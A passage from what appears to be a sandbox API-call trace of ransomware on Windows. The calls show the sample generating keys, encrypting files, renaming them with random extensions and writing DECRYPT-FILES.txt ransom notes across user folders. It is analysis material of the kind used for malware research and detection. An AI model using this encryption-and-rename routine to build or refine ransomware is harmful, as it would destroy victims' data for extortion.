"c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.guWw07f" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.guww07f"), dwFlags=0x0) returned 1 [0088.482] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0088.483] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.483] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.483] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfa0000*, pdwDataLen=0x3f2e2d0*=0x28, dwBufLen=0x100 | out: pbData=0xfa0000*, pdwDataLen=0x3f2e2d0*=0x100) returned 1 [0088.510] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.510] WriteFile (in: hFile=0x430, lpBuffer=0xfa0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e2f0, lpOverlapped=0x0 | out: lpBuffer=0xfa0000*, lpNumberOfBytesWritten=0x3f2e2f0*=0x108, lpOverlapped=0x0) returned 1 [0088.512] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.512] lstrlenW (lpString="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 109 [0088.512] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY") returned 114 [0088.512] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.FwcY" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.fwcy"), dwFlags=0x0) returned 1 [0088.513] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\Default\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0088.514] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.514] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.514] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e2d0*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e2d0*=0x100) returned 1 [0088.514] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.514] WriteFile (in: hFile=0x430, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e2f0, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e2f0*=0x108, lpOverlapped=0x0) returned 1 [0088.515] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.516] lstrlenW (lpString="C:\\Users\\Default\\ntuser.ini") returned 27 [0088.516] wsprintfW (in: param_1=0x3f2e39c, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\ntuser.ini.FwcY") returned 32 [0088.516] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), lpNewFileName="C:\\Users\\Default\\ntuser.ini.FwcY" (normalized: "c:\\users\\default\\ntuser.ini.fwcy"), dwFlags=0x0) returned 1 [0088.516] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Pictures\\\\jkbimi8.tmp") returned 38 [0088.516] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\pictures\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.517] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\") returned 26 [0088.517] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.517] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Pictures\\\\DECRYPT-FILES.txt") returned 44 [0088.517] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.517] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\") returned 26 [0088.517] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Pictures\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0088.517] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\PrintHood\\\\jkbimi8.tmp") returned 39 [0088.517] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\printhood\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.518] lstrlenW (lpString="C:\\Users\\Default\\PrintHood\\") returned 27 [0088.518] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.518] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\PrintHood\\\\DECRYPT-FILES.txt") returned 45 [0088.518] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\printhood\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.518] lstrlenW (lpString="C:\\Users\\Default\\PrintHood\\") returned 27 [0088.518] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Recent\\\\jkbimi8.tmp") returned 36 [0088.518] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\recent\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.518] lstrlenW (lpString="C:\\Users\\Default\\Recent\\") returned 24 [0088.518] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.518] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Recent\\\\DECRYPT-FILES.txt") returned 42 [0088.518] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.518] lstrlenW (lpString="C:\\Users\\Default\\Recent\\") returned 24 [0088.519] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Saved Games\\\\jkbimi8.tmp") returned 41 [0088.519] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\saved games\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.519] lstrlenW (lpString="C:\\Users\\Default\\Saved Games\\") returned 29 [0088.519] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.519] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Saved Games\\\\DECRYPT-FILES.txt") returned 47 [0088.519] CreateFileW (lpFileName="C:\\Users\\Default\\Saved Games\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\saved games\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.520] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.521] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Saved Games\\" | out: lpString1="C:\\Users\\Default\\Saved Games\\") returned="C:\\Users\\Default\\Saved Games\\" [0088.521] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Searches\\\\jkbimi8.tmp") returned 38 [0088.521] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\searches\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.523] lstrlenW (lpString="C:\\Users\\Default\\Searches\\") returned 26 [0088.523] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.523] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Searches\\\\DECRYPT-FILES.txt") returned 44 [0088.523] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\searches\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.524] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.525] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0088.526] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0088.526] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Searches\\" | out: lpString1="C:\\Users\\Default\\Searches\\") returned="C:\\Users\\Default\\Searches\\" [0088.526] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\SendTo\\\\jkbimi8.tmp") returned 36 [0088.526] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\sendto\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.527] lstrlenW (lpString="C:\\Users\\Default\\SendTo\\") returned 24 [0088.527] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.527] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\SendTo\\\\DECRYPT-FILES.txt") returned 42 [0088.527] CreateFileW (lpFileName="C:\\Users\\Default\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.527] lstrlenW (lpString="C:\\Users\\Default\\SendTo\\") returned 24 [0088.527] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Start Menu\\\\jkbimi8.tmp") returned 40 [0088.527] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\start menu\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.527] lstrlenW (lpString="C:\\Users\\Default\\Start Menu\\") returned 28 [0088.527] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.527] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Start Menu\\\\DECRYPT-FILES.txt") returned 46 [0088.527] CreateFileW (lpFileName="C:\\Users\\Default\\Start Menu\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\start menu\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.527] lstrlenW (lpString="C:\\Users\\Default\\Start Menu\\") returned 28 [0088.527] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Templates\\\\jkbimi8.tmp") returned 39 [0088.527] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\templates\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.528] lstrlenW (lpString="C:\\Users\\Default\\Templates\\") returned 27 [0088.528] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.528] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Templates\\\\DECRYPT-FILES.txt") returned 45 [0088.528] CreateFileW (lpFileName="C:\\Users\\Default\\Templates\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\templates\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.528] lstrlenW (lpString="C:\\Users\\Default\\Templates\\") returned 27 [0088.528] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Videos\\\\jkbimi8.tmp") returned 36 [0088.528] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\videos\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.528] lstrlenW (lpString="C:\\Users\\Default\\Videos\\") returned 24 [0088.528] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.528] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Videos\\\\DECRYPT-FILES.txt") returned 42 [0088.528] CreateFileW (lpFileName="C:\\Users\\Default\\Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.529] lstrlenW (lpString="C:\\Users\\Default\\Videos\\") returned 24 [0088.529] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Default\\Videos\\" | out: lpString1="C:\\Users\\Default\\Videos\\") returned="C:\\Users\\Default\\Videos\\" [0088.529] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\Default User\\\\jkbimi8.tmp") returned 34 [0088.529] CreateFileW (lpFileName="C:\\Users\\Default User\\\\jkbimi8.tmp" (normalized: "c:\\users\\default user\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0088.530] lstrlenW (lpString="C:\\Users\\Default User\\") returned 22 [0088.530] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.530] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\Default User\\\\DECRYPT-FILES.txt") returned 40 [0088.530] CreateFileW (lpFileName="C:\\Users\\Default User\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default user\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.530] lstrlenW (lpString="C:\\Users\\Default User\\") returned 22 [0088.530] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Users\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\" [0088.530] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\\\jkbimi8.tmp") returned 28 [0088.530] CreateFileW (lpFileName="C:\\Users\\Public\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0088.531] lstrlenW (lpString="C:\\Users\\Public\\") returned 16 [0088.531] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.531] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\\\DECRYPT-FILES.txt") returned 34 [0088.531] CreateFileW (lpFileName="C:\\Users\\Public\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0088.531] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0088.532] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Desktop\\\\jkbimi8.tmp") returned 36 [0088.532] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\desktop\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.533] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\") returned 24 [0088.533] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.533] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Desktop\\\\DECRYPT-FILES.txt") returned 42 [0088.533] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\desktop\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.534] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.535] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Desktop\\" | out: lpString1="C:\\Users\\Public\\Desktop\\") returned="C:\\Users\\Public\\Desktop\\" [0088.535] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\\\jkbimi8.tmp") returned 38 [0088.535] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\documents\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.535] lstrlenW (lpString="C:\\Users\\Public\\Documents\\") returned 26 [0088.535] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.535] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\\\DECRYPT-FILES.txt") returned 44 [0088.535] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0088.536] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.537] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\Public\\Documents\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0088.537] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\\\jkbimi8.tmp") returned 47 [0088.537] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\documents\\my music\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.537] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Music\\") returned 35 [0088.537] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.538] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\\\DECRYPT-FILES.txt") returned 53 [0088.538] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\my music\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.539] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.540] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\\\jkbimi8.tmp") returned 50 [0088.540] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\documents\\my pictures\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.541] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Pictures\\") returned 38 [0088.541] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.541] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\\\DECRYPT-FILES.txt") returned 56 [0088.541] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\my pictures\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.543] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.544] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\\\jkbimi8.tmp") returned 48 [0088.544] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\documents\\my videos\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x410 [0088.544] lstrlenW (lpString="C:\\Users\\Public\\Documents\\My Videos\\") returned 36 [0088.544] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.544] wsprintfW (in: param_1=0x3f2e6b4, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\\\DECRYPT-FILES.txt") returned 54 [0088.544] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\public\\documents\\my videos\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x414 [0088.546] WriteFile (in: hFile=0x414, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e6b0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e6b0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.547] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\Public\\Downloads\\\\jkbimi8.tmp") returned 38 [0088.547] CreateFileW (lpFileName="C:\\Users\\Public\\Downloads\\\\jkbimi8.tmp" (normalized: "c:\\users\\public\\downloads\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0088.547] lstrlenW (lpString="C:\\Users\\Public\\Downloads\\") returned 26 [0088.547] lstrlenW 